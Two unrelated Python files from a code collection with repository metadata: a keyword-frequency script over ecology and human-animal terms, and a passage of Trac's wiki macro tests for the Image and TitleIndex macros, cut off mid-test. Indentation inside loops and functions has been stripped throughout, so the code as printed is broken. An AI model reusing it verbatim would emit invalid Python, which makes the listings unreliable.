276334bb3f657f94e88a758c2ddf634025db6af8 | 11,720 | py | Python | i-data-structures/redundant_keywords.py | eda-ricercatore/python-sandbox | 741d23e15f22239cb5df8af6e695cd8e3574be50 | [
"MIT"
] | null | null | null | i-data-structures/redundant_keywords.py | eda-ricercatore/python-sandbox | 741d23e15f22239cb5df8af6e695cd8e3574be50 | [
"MIT"
] | null | null | null | i-data-structures/redundant_keywords.py | eda-ricercatore/python-sandbox | 741d23e15f22239cb5df8af6e695cd8e3574be50 | [
"MIT"
] | null | null | null | #!/usr/local/bin/python3
import statistics
from collections import Counter
list_of_keywords = ["human-animal coexistence", "human-animal coexistence - recommendations", "transforming our mental & physical & spiritual lives", "antidote to the growing epidemic of human loneliness", "growing epidemic of human loneliness", "epidemic of human loneliness", "human loneliness", "loneliness", "loneliness - social challenge", "human loneliness - epidemic of", "loneliness - epidemic of", "empathy", "empathy-building interventions", "dogs teaching children ethical behavior", "animal-assisted therapy", "animal-assisted therapy - for loneliness", "mental health", "mental health issues", "mental health practice", "human-animal relationships", "spiritual health", "wildlife relocation", "growing populations of wild species in urban areas are blurring the lines between domestic and wild animals", "urban areas with growing populations of wild species", "therapeutic use of animals", "animals - therapeutic use of", "human-animal communication", "biological species loneliness", "human exceptionalism", "human exceptionalism - altered view of", "human-animal communication - life-changing encounters with animals", "human loneliness - aching hearts", "loneliness - aching hearts", "human-animal coexistence - wild animals & domestic animals & robotic pets", "herping", "US herping", "animal-assisted self-care", "human-animal coexistence - wildlife & therapy & pet effect", "uncanny valley of lifelike humanoid robots & realistic computer-generated faces", "virtual worlds", "virtual communities", "alternative universe", "age of connectedness", "cohabitation", "cohabitation - new contract for", "neophiles", "neophiliacs", "neophilia", "neophobia", "neophobes", "metathesiophobia", "prosophobia", "cainotophobia", "cainophobia", "kainophobia", "kainolophobia", "built environment", "built world", "urbanism - human interaction with wildlife in the built environment", "urbanism - human interaction with wildlife in the built world", "landscape urbanism", "green urbanism", "sustainable urbanism", "sustainable corridors", "biophilia hypothesis", "BET", "habitat fragmentation", "habitat fragmentation caused by urbanization", "habitat fragmentation caused by human development", "habitat fragmentation - exogenous threats", "habitat fragmentation - exogenous threats due to habitat degradation & habitat subdivision & habitat isolation", "habitat fragmentation - endogenous threats", "edge effects of habitat degradation", "edge effects of urbanism-driven habitat degradation", "microenvironments", "forest fragmentation", "island biogeography", "habitat destruction", "habitat loss", "habitat reduction", "habitat destruction caused by urbanization", "habitat loss caused by urbanization", "habitat reduction caused by urbanization", "deforestation", "clearance (deforestation)", "clearcutting (deforestation)", "clearing (deforestation)", "edge effects of urbanism-driven habitat degradation - increasing probabilities of human interaction with wildlife", "edge effects of urbanism-driven habitat degradation - increasing probabilities of human interaction with wildlife increases need for intelligent urbanism", "ecological habitats", "habitats (ecology)", "community (ecology)", "community ecology", "synecology", "macroecology", "microecosystems", "systems ecology", "ecosystems ecology", "ecological engineering", "human impact on the environment", "anthropogenic impact on the environment", "community resilience", "environmental issues", "relationship between urbanization & environmental issues", "impact of urbanization on 
biophysical environments", "evolutionary ecology", "sociobiology", "human behavioral ecology", "HBE", "human evolutionary ecology", "Darwinian anthropology", "biosemiotics", "social evolution", "ecosystem health", "human impact on the environment - due to urbanization", "relationship between urbanization & ecosystem health", "impact of urbanization on ecosystem health", "environmental epidemiology", "communicable disease epidemiology", "cultural epidemiology", "relationship between urbanization & deforestation & ecosystem health", "impact of urbanization & deforestation on ecosystem health", "exposure science", "ecosystem management", "ecosystem-based management", "natural resource management", "ecological health", "microhabitats", "spatial ecology", "spatial dynamics of population & community ecology", "population ecology", "autecology", "species distribution", "population dynamics", "deep ecology", "ecological stoichiometry", "biological stoichiometry", "environmental humanities", "ecological humanities", "cross-boundary subsidies", "habitat patch boundaries", "patches (landscape ecology)", "patch dynamics", "matrices (background ecological system)", "landscape ecology", "landscape connectivity", "biogeography", "historical biogeography", "ecological biogeography", "comparative biogeography", "systematic biogeography", "evolutionary biogeography", "biogeographic regionalization", "ecological disturbances", "natural disturbances (ecology)", "anthropogenic disturbances (ecology)", "major ecological disturbances", "cyclic disturbances (ecology)", "ecological succession (ecology)", "ecological succession", "human-wildlife conflict", "interaction between wild animals & humans", "interaction between wild animals & humans - negative impact on people & animals & resources & habitats", "interaction between wild animals & humans - growing human populations overlap with established wildlife territory & creating competition for space and resources", "interaction between wild animals & humans - loss of life & injury to humans and wild animals & depredation of livestock & degradation of habitat", "forest dynamics", "forest disturbances", "environmental stressors", "daily 'stress' events", "chemical stressors", "ecotones", "ecotone transitions", "ecoclines", "ecocline transitions", "ecotypes", "ecospecies", "landscape epidemiology", "metapopulations", "resource selection functions", "RSFs", "source-sink dynamics", "habitat/species management areas", "human development (economics)", "environmental security", "health security (human security)", "human security", "personal security", "community security", "political security", "wildlife crossings", "habitat conservation", "habitat fragmentation due to human-made barriers", "habitat fragmentation due to human-made barriers - roads & railroads & canals & electric power lines & pipelines", "wildlife populations", "wildlife populations affected by demographic & genetic & environmental stochasticity", "wildlife populations affected by demographic stochasticity", "wildlife populations affected by genetic stochasticity", "wildlife populations affected by environmental stochasticity", "restoration ecology", "ecological restoration", "community assembly (community ecology)", "conservation biology", "anthropogenic impact on ecosystems", "wildlife corridors", "habitat corridors", "green corridors", "generalist species", "specialist species", "SLOSS debate in ecology & conservation biology about single large or several small reserves", "edge effects (ecology)", 
"urban homesteading", "sustainable living", "urban agriculture", "urban gardening", "urban farming", "peri-urban agriculture"]
a = max(list_of_keywords, key=list_of_keywords.count)
print("a is:",a,"=")
"""
Uncomment the next line if the elements in the list occur with different frequencies.
"""
#############print("mode is:", statistics.mode(list_of_keywords),"=")
"""
From https://www.geeksforgeeks.org/python-list-frequency-of-elements/
Last accessed on May 18, 2020.
Author: manjeet_04.
No date of publication.
"""
print("Test methods from: https://www.geeksforgeeks.org/python-list-frequency-of-elements/")
print("Method 1.")
res = dict(Counter(i for i in list_of_keywords))
#print("The list frequency of elements is: ", str(res), "=")
for j in res:
print("j is:",j,"with count:",res[j],"=")
"""
This method cannot work for a flat list of strings, because it expects a
container of containers (e.g. a set of sets or a list of lists).
print("Method 2.")
from itertools import chain
res = dict(Counter(chain.from_iterable(map(set, list_of_keywords))))
"""
#res = all([val[1] == ])
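# Hedged illustration (added; not from the referenced article): the recipe in
# the docstring above does work for a container of containers; the toy nested
# list below is hypothetical and counts how many sub-lists each item appears in.
from itertools import chain
nested_demo = [["wildlife", "urbanism"], ["wildlife", "loneliness"], ["wildlife"]]
print("nested demo:", dict(Counter(chain.from_iterable(map(set, nested_demo)))), "=")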
print("=======================================================")
print(" Test methods on list of keywords with duplicates.")
duplicates_in_list = ["wildlife relocation", "growing populations of wild species in urban areas are blurring the lines between domestic and wild animals", "urban areas with growing populations of wild species", "therapeutic use of animals", "animals - therapeutic use of", "human-animal communication", "biological species loneliness", "human exceptionalism", "human exceptionalism - altered view of", "human-animal communication - life-changing encounters with animals", "human loneliness - aching hearts", "loneliness - aching hearts", "human-animal coexistence - wild animals & domestic animals & robotic pets", "herping", "US herping", "animal-assisted self-care", "human-animal coexistence - wildlife & therapy & pet effect", "uncanny valley of lifelike humanoid robots & realistic computer-generated faces", "virtual worlds", "animals - therapeutic use of", "animals - therapeutic use of", "animals - therapeutic use of", "animals - therapeutic use of", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "herping", "virtual worlds", "virtual worlds", "virtual worlds", "human-animal communication", "human-animal communication", "human-animal communication", "human-animal communication", "US herping", "US herping", "loneliness - aching hearts"]
print("mode is:", statistics.mode(duplicates_in_list),"=")
res = sorted(duplicates_in_list, key = lambda ele: duplicates_in_list.count(ele))
for j in res:
#print("j is:",j,"with count:",res[j],"=")
print("j is:",j,"=")
print("res is:",res,"=")
res = dict(Counter(i for i in duplicates_in_list))
for j in res:
print("j is:",j,"with count:",res[j],"=")
print("=======================================================")
print("From: https://stackoverflow.com/a/613218/1531728.")
import operator
print(" = Sorted dict in ascending order.")
res_sorted = {k: v for k, v in sorted(res.items(), key=lambda item: item[1])}
for j_s in res_sorted:
print("j_s is:",j_s,"with count:",res[j_s],"=")
print(" = Sorted dict in descending order.")
res_x = {k: v for k, v in sorted(res.items(), key=lambda item: item[1], reverse=True)}
for j_x in res_x:
print("j_x is:",j_x,"with count:",res[j_x],"=")
"""
sorted_dict = sorted(res.values())
for j_d in sorted_dict:
print("j_d is:",j_d,"with count:",res[j_d],"=")
"""
print("From https://stackoverflow.com/a/22150003/1531728")
res_des = dict(Counter(i for i in duplicates_in_list).most_common())
for j_des in res_des:
# Solution 1.
print("j_des is:",j_des,"with count:",res[j_des],"=")
print("From https://stackoverflow.com/a/7947321/1531728")
for word in sorted(res, key=res.get, reverse=True):
# Solution 2.
print("word is:",word, "and frequency is:",res[word],"=")
print("https://stackoverflow.com/a/50554874/1531728")
res_lst = sorted([(v, k) for k, v in res.items()], reverse=True)
for r in res_lst:
# Solution 3.
print("r is:",r,"=")
for (freq,kwd) in res_lst:
print("f:",freq," and k:",kwd,"=")
"""
References that were looked at, but did not use:
+ https://www.geeksforgeeks.org/python-sort-given-list-by-frequency-and-remove-duplicates/?ref=rp
+ https://www.pythoncentral.io/how-to-sort-python-dictionaries-by-key-or-value/
For more solutions, see:
+ https://stackoverflow.com/q/613183/1531728
""" | 134.712644 | 7,229 | 0.750597 |
fc1c57a6b77db6539cbf64072aa8834ae0179a84 | 29,096 | py | Python | trac/wiki/tests/macros.py | pkdevbox/trac | d044fc469e4dcbc5901c992b1b4160e9cbecee25 | [
"BSD-3-Clause"
] | null | null | null | trac/wiki/tests/macros.py | pkdevbox/trac | d044fc469e4dcbc5901c992b1b4160e9cbecee25 | [
"BSD-3-Clause"
] | null | null | null | trac/wiki/tests/macros.py | pkdevbox/trac | d044fc469e4dcbc5901c992b1b4160e9cbecee25 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2013 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://trac.edgewall.org/wiki/TracLicense.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://trac.edgewall.org/log/.
from StringIO import StringIO
from datetime import datetime
import os
import shutil
import tempfile
import unittest
from trac.config import Option, ListOption, IntOption, BoolOption
from trac.test import locale_en
from trac.util.datefmt import format_date, utc
from trac.wiki.model import WikiPage
from trac.wiki.tests import formatter
def add_pages(tc, names):
now = datetime.now(utc)
for name in names:
w = WikiPage(tc.env)
w.name = name
w.text = '--'
w.save('joe', 'the page ' + name, '::1', now)
# == [[Image]]
def image_setup(tc):
add_pages(tc, ['page:fr'])
from trac.attachment import Attachment
tc.env.path = tempfile.mkdtemp(prefix='trac-tempenv-')
attachment = Attachment(tc.env, 'wiki', 'page:fr')
attachment.description = "image in page:fr"
attachment.insert('img.png', StringIO(''), 0, 2)
tc.env.config.set('interwiki', 'shields', 'https://img.shields.io/')
tc.env.config.set('interwiki', 'travis',
'https://travis-ci.org/$1?branch=$2')
htdocs_location = 'http://assets.example.org/common'
tc.context.req.chrome['htdocs_location'] = htdocs_location
tc.env.config.set('trac', 'htdocs_location', htdocs_location)
def image_teardown(tc):
shutil.rmtree(os.path.join(tc.env.path, 'files'))
os.rmdir(tc.env.path)
tc.env.reset_db()
# Note: using `« test »` string in the following tests for checking
# unicode robustness and whitespace support (first space is
# normal ASCII SPACE, second is Unicode NO-BREAK SPACE).
IMAGE_MACRO_TEST_CASES = u"""
============================== source: Image, no other arguments
[[Image(source:« test ».png)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB.png"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" alt="source:« test ».png" title="source:« test ».png" /></a>
</p>
------------------------------
[[Image(...)]]
============================== source: Image, inline
[[Image(source:« test ».png, inline)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB.png"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" alt="source:« test ».png" title="source:« test ».png" /></a>
</p>
------------------------------
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB.png"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" alt="source:« test ».png" title="source:« test ».png" /></a>
============================== intertrac:source: Image, no other arguments
[[Image(trac:source:/trunk/doc/images/bkgnd_pattern_« test ».png)]]
------------------------------
<p>
<a style="padding:0; border:none" href="http://trac.edgewall.org/intertrac/source%3A/trunk/doc/images/bkgnd_pattern_%C2%AB%20test%C2%A0%C2%BB.png"><img src="http://trac.edgewall.org/intertrac/source%3A/trunk/doc/images/bkgnd_pattern_%C2%AB%20test%C2%A0%C2%BB.png%3Fformat%3Draw" alt="source:/trunk/doc/images/bkgnd_pattern_« test ».png in Trac's Trac" title="source:/trunk/doc/images/bkgnd_pattern_« test ».png in Trac's Trac" /></a>
</p>
============================== source: Image, nolink
[[Image(source:« test », nolink)]]
------------------------------
<p>
<img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="source:« test »" title="source:« test »" />
</p>
============================== source: Image, normal args
[[Image(source:« test », align=left, title=Test)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="source:« test »" style="float:left" title="Test" /></a>
</p>
============================== source: Image, size arg
[[Image(source:« test », 30%)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB"><img width="30%" alt="source:« test »" title="source:« test »" src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" /></a>
</p>
============================== source: Image, keyword alignment
[[Image(source:« test », right)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/browser/%C2%AB%20test%C2%A0%C2%BB"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="source:« test »" style="float:right" title="source:« test »" /></a>
</p>
============================== http: Image, nolink
[[Image(http://www.edgewall.com/gfx/shredder_« test ».png, nolink)]]
------------------------------
<p>
<img src="http://www.edgewall.com/gfx/shredder_« test ».png" alt="http://www.edgewall.com/gfx/shredder_« test ».png" title="http://www.edgewall.com/gfx/shredder_« test ».png" />
</p>
============================== http: Image, absolute, many ':'
[[Image(http://chart.apis.google.com:80/chart?cht=p3&chd=s:hW&chs=250x100&chl=Héllo|Wôrld, title=Google & Charting, link=)]]
------------------------------
<p>
<img src="http://chart.apis.google.com:80/chart?cht=p3&chd=s:hW&chs=250x100&chl=Héllo|Wôrld" alt="http://chart.apis.google.com:80/chart" title="Google & Charting" />
</p>
============================== // Image, server-relative
[[Image(//browser/« test »?format=raw, link=)]]
------------------------------
<p>
<img src="/browser/« test »?format=raw" alt="/browser/« test »" title="/browser/« test »" />
</p>
============================== / Image, project-relative, link to WikiStart
[[Image(/browser/« test »?format=raw, link=wiki:WikiStart)]]
------------------------------
<p>
<a style="padding:0; border:none" href="/wiki/WikiStart"><img src="/browser/%C2%AB%20test%C2%A0%C2%BB?format=raw" alt="/browser/« test »" title="/browser/« test »" /></a>
</p>
============================== Strip unicode white-spaces and ZWSPs (#10668)
[[Image( source:« test ».png , nolink, 100% )]]
------------------------------
<p>
<img width="100%" alt="source:« test ».png" title="source:« test ».png" src="/browser/%C2%AB%20test%C2%A0%C2%BB.png?format=raw" />
</p>
============================== Attachments on page with ':' characters (#10562)
[[Image("page:fr":img.png,nolink)]]
------------------------------
<p>
<img src="/raw-attachment/wiki/page%3Afr/img.png" alt="image in page:fr" title="image in page:fr" />
</p>
============================== htdocs: Image, nolink
[[Image(htdocs:trac_logo.png, nolink)]]
------------------------------
<p>
<img src="/chrome/site/trac_logo.png" alt="trac_logo.png" title="trac_logo.png" />
</p>
============================== shared: Image, nolink
[[Image(shared:trac_logo.png, nolink)]]
------------------------------
<p>
<img src="/chrome/shared/trac_logo.png" alt="trac_logo.png" title="trac_logo.png" />
</p>
==============================
[[Image("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=")]]
------------------------------
<p>
<a style="padding:0; border:none" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII="><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" alt="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" title="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" /></a>
</p>
==============================
[[Image("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=", nolink)]]
------------------------------
<p>
<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" alt="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" title="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAACgAAAAoAQMAAAC2MCouAAAAA1BMVEXLQ0MOAUiXAAAAC0lEQVQIHWMYYQAAAPAAASEIRrcAAAAASUVORK5CYII=" />
</p>
============================== InterWiki
[[Image(shields:travis/edgewall/trac.svg, link=trac:source:/trunk)]]
[[Image(travis:edgewall/trac.svg:1.0-stable, link=trac:source:/branches/1.0-stable)]]
------------------------------
<p>
<a style="padding:0; border:none" href="http://trac.edgewall.org/intertrac/source%3A/trunk"><img src="https://img.shields.io/travis/edgewall/trac.svg" alt="travis/edgewall/trac.svg in shields" title="travis/edgewall/trac.svg in shields" /></a>
<a style="padding:0; border:none" href="http://trac.edgewall.org/intertrac/source%3A/branches/1.0-stable"><img src="https://travis-ci.org/edgewall/trac.svg?branch=1.0-stable" alt="edgewall/trac.svg:1.0-stable in travis" title="edgewall/trac.svg:1.0-stable in travis" /></a>
</p>
============================== InterWiki, nolink
[[Image(shields:pypi/dm/trac.svg, nolink)]]
------------------------------
<p>
<img src="https://img.shields.io/pypi/dm/trac.svg" alt="pypi/dm/trac.svg in shields" title="pypi/dm/trac.svg in shields" />
</p>
==============================
[[Image(notfound.png, nolink)]]
------------------------------
<p>
<img src="http://assets.example.org/common/attachment.png" alt="No image "notfound.png" attached to WikiStart" title="No image "notfound.png" attached to WikiStart" />
</p>
"""
# Note: in the <img> src attribute above, the Unicode characters
# within the URI sometimes come out as %-encoded, sometimes raw
# (server-relative case). Both forms are valid (at least
# according to the W3C XHTML validator).
# == [[TitleIndex]]
def titleindex_teardown(tc):
tc.env.reset_db()
TITLEINDEX1_MACRO_TEST_CASES = u"""
============================== TitleIndex, default format
[[TitleIndex()]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex]]
============================== TitleIndex, compact format
[[TitleIndex(format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiStart">WikiStart</a>
</p>
------------------------------
[[TitleIndex(...)]]
"""
TITLEINDEX2_MACRO_TEST_CASES = u"""
============================== TitleIndex, default format
[[TitleIndex()]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiEnd">WikiEnd</a></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex]]
============================== TitleIndex, compact format
[[TitleIndex(format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiEnd">WikiEnd</a>, <a href="/wiki/WikiStart">WikiStart</a>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, default format with prefix
[[TitleIndex(Wiki)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiEnd">WikiEnd</a></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, compact format with prefix
[[TitleIndex(Wiki,format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiEnd">WikiEnd</a>, <a href="/wiki/WikiStart">WikiStart</a>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, default format with prefix hidden
[[TitleIndex(Wiki,hideprefix)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiEnd">End</a></li><li><a href="/wiki/WikiStart">Start</a></li></ul></div><p>
</p>
------------------------------
[[TitleIndex(...)]]
============================== TitleIndex, compact format with prefix hidden
[[TitleIndex(Wiki,hideprefix,format=compact)]]
------------------------------
<p>
<a href="/wiki/WikiEnd">End</a>, <a href="/wiki/WikiStart">Start</a>
</p>
------------------------------
[[TitleIndex(...)]]
"""
def titleindex2_setup(tc):
add_pages(tc, ['WikiEnd'])
TITLEINDEX3_MACRO_TEST_CASES = u"""
============================== TitleIndex, group format
[[TitleIndex(Wiki,format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>Wiki</strong><ul><li><strong>End</strong><ul><li><a href="/wiki/WikiEnd/First">WikiEnd/First</a></li><li><a href="/wiki/WikiEnd/Second">WikiEnd/Second</a></li></ul></li><li><strong>Start</strong><ul><li><a href="/wiki/WikiStart">WikiStart</a></li><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></li></ul></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, hierarchy format
[[TitleIndex(WikiStart/, format=hierarchy)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li>WikiStart<ul><li><a href="/wiki/WikiStart/First">First</a></li><li><a href="/wiki/WikiStart/Second">Second</a></li><li><a href="/wiki/WikiStart/Third">Third</a></li></ul></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, group format, prefix hidden
[[TitleIndex(Wiki,hideprefix,format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>End</strong><ul><li><a href="/wiki/WikiEnd/First">End/First</a></li><li><a href="/wiki/WikiEnd/Second">End/Second</a></li></ul></li><li><strong>Start</strong><ul><li><a href="/wiki/WikiStart">Start</a></li><li><a href="/wiki/WikiStart/First">Start/First</a></li><li><a href="/wiki/WikiStart/Second">Start/Second</a></li><li><a href="/wiki/WikiStart/Third">Start/Third</a></li></ul></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, hierarchy format, prefix hidden
[[TitleIndex(WikiStart/,hideprefix,format=hierarchy)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">First</a></li><li><a href="/wiki/WikiStart/Second">Second</a></li><li><a href="/wiki/WikiStart/Third">Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix
[[TitleIndex(../../WikiStart)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart">WikiStart</a></li><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix with trailing slash
[[TitleIndex(../../WikiStart/)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix ..
[[TitleIndex(..)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart">WikiStart</a></li><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix ../
[[TitleIndex(../)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">WikiStart/First</a></li><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li><li><a href="/wiki/WikiStart/Third">WikiStart/Third</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix .
[[TitleIndex(.)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/Second">WikiStart/Second</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative prefix ./
[[TitleIndex(./)]]
------------------------------
<p>
</p><div class="titleindex"><ul></ul></div><p>
</p>
------------------------------
============================== TitleIndex, relative hidden prefix ../
[[TitleIndex(../,hideprefix)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/WikiStart/First">First</a></li><li><a href="/wiki/WikiStart/Second">Second</a></li><li><a href="/wiki/WikiStart/Third">Third</a></li></ul></div><p>
</p>
------------------------------
"""
def titleindex3_setup(tc):
add_pages(tc, [
'WikiStart/First',
'WikiStart/Second',
'WikiStart/Third',
'WikiEnd/First',
'WikiEnd/Second',
])
TITLEINDEX4_MACRO_TEST_CASES = u"""
============================== TitleIndex group and page with numbers (#7919)
[[TitleIndex(format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>0.11</strong><ul><li><strong>Group</strong><ul><li><a href="/wiki/0.11/GroupOne">0.11/GroupOne</a></li><li><a href="/wiki/0.11/GroupTwo">0.11/GroupTwo</a></li></ul></li><li><a href="/wiki/0.11/Test">0.11/Test</a></li></ul></li><li><strong>Test</strong><ul><li><strong>0.11</strong><ul><li><a href="/wiki/Test0.11/Abc">Test0.11/Abc</a></li><li><a href="/wiki/Test0.11Abc">Test0.11Abc</a></li></ul></li><li><strong>0.12</strong><ul><li><a href="/wiki/Test0.12Def">Test0.12Def</a></li><li><a href="/wiki/Test0.12Ijk">Test0.12Ijk</a></li></ul></li><li><strong>0.13</strong><ul><li><a href="/wiki/Test0.13alpha">Test0.13alpha</a></li><li><a href="/wiki/Test0.13beta">Test0.13beta</a></li></ul></li><li><a href="/wiki/Test0.131">Test0.131</a></li><li><a href="/wiki/Test2">Test2</a></li><li><a href="/wiki/TestTest">TestTest</a></li><li><a href="/wiki/TestThing">TestThing</a></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, compact format with prefix hidden, including Test0.13*
[[TitleIndex(Test,format=compact,include=*0.13*)]]
------------------------------
<p>
<a href="/wiki/Test0.131">Test0.131</a>, <a href="/wiki/Test0.13alpha">Test0.13alpha</a>, <a href="/wiki/Test0.13beta">Test0.13beta</a>
</p>
------------------------------
============================== TitleIndex, compact format with prefix hidden, including Test0.13* but excluding Test0.131
[[TitleIndex(Test,format=compact,include=*0.13*,exclude=*1)]]
------------------------------
<p>
<a href="/wiki/Test0.13alpha">Test0.13alpha</a>, <a href="/wiki/Test0.13beta">Test0.13beta</a>
</p>
------------------------------
============================== TitleIndex, compact format, excluding various topics
[[TitleIndex(Test,format=compact,exclude=Test0.13*:*0.11*:Test2:Test*i*)]]
------------------------------
<p>
<a href="/wiki/Test0.12Def">Test0.12Def</a>, <a href="/wiki/Test0.12Ijk">Test0.12Ijk</a>, <a href="/wiki/TestTest">TestTest</a>
</p>
------------------------------
============================== TitleIndex, compact format, including and excluding various topics
[[TitleIndex(format=compact,include=*Group*:test2,exclude=*One)]]
------------------------------
<p>
<a href="/wiki/0.11/GroupTwo">0.11/GroupTwo</a>
</p>
------------------------------
"""
def titleindex4_setup(tc):
add_pages(tc, [
'TestTest',
'TestThing',
'Test2',
'Test0.11Abc',
'Test0.11/Abc',
'Test0.12Def',
'Test0.12Ijk',
'Test0.13alpha',
'Test0.13beta',
'Test0.131',
'0.11/Test',
'0.11/GroupOne',
'0.11/GroupTwo',
])
TITLEINDEX5_MACRO_TEST_CASES = u"""
============================== TitleIndex, hierarchy format with complex hierarchy
[[TitleIndex(format=hierarchy)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/TracDev">TracDev</a><ul><li><a href="/wiki/TracDev/ApiChanges">ApiChanges</a><ul><li><a href="/wiki/TracDev/ApiChanges/0.10">0.10</a></li><li><a href="/wiki/TracDev/ApiChanges/0.11">0.11</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12">0.12</a><ul><li>Missing<ul><li><a href="/wiki/TracDev/ApiChanges/0.12/Missing/Exists">Exists</a></li></ul></li></ul></li></ul></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, hierarchy format with complex hierarchy (and min=5)
